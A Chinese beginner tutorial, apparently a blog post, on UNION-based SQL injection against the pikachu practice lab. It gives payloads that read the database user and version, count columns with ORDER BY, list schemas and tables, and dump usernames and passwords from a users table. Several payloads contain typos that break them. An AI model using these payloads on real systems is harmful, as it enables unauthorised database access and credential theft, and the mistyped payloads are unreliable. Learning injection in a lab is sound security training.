【新手初学】读取数据库数据

利用注入点让SQL注入语句执行读取数据库数据相关的操作!

以下均以pikachu 靶场的字符型注入为例进行介绍说明

一、读取用户名,数据库版本信息

在原URL后面添加如下代码:

sql 复制代码
   ' union select user(),version()--+

效果:

补充:判断查询的字段个数order by

这时,就需要在相应环境下进行测试判断:主要是使用order by来判断

在后面添加1,2,3,4,5,6....进行测试,直到不再报错 !就判断出了其查询字段个数

如下:

二、读取mysql所有库名

在原URL后面添加如下语句:

sql 复制代码
' union select 1,group_concat(schema_name) from information_schema,schemata+--+

效果:

三、读取pikachu库的所有表名

在原URL后面添加如下语句:

sql 复制代码
'unnion select 1,group_concat(table_name) from information_schema.tables where table_schema=database+--+

效果:

四、读取所有字段数据

在原URL后面添加如下语句:

sql 复制代码
' union select 1,group_concat(id,0x7c,username,0x7c,password,0x7c,level,0x7c) from users+--+

效果:

相关推荐
烛阴35 分钟前
带你用TS彻底搞懂ECS架构模式
前端·javascript·typescript
btyzadt1 小时前
Xray与XPOC工具对比分析
网络·安全·web安全
卓码软件测评1 小时前
【第三方网站运行环境测试:服务器配置(如Nginx/Apache)的WEB安全测试重点】
运维·服务器·前端·网络协议·nginx·web安全·apache
龙在天1 小时前
前端不求人系列 之 一条命令自动部署项目
前端
开开心心就好1 小时前
PDF转长图工具,一键多页转图片
java·服务器·前端·数据库·人工智能·pdf·推荐算法
国家不保护废物1 小时前
10万条数据插入页面:从性能优化到虚拟列表的终极方案
前端·面试·性能优化
文心快码BaiduComate2 小时前
七夕,画个动态星空送给Ta
前端·后端·程序员
web前端1232 小时前
# 多行文本溢出实现方法
前端·javascript
文心快码BaiduComate2 小时前
早期人类奴役AI实录:用Comate Zulu 10min做一款Chrome插件
前端·后端·程序员
人间观察员2 小时前
如何在 Vue 项目的 template 中使用 JSX
前端·javascript·vue.js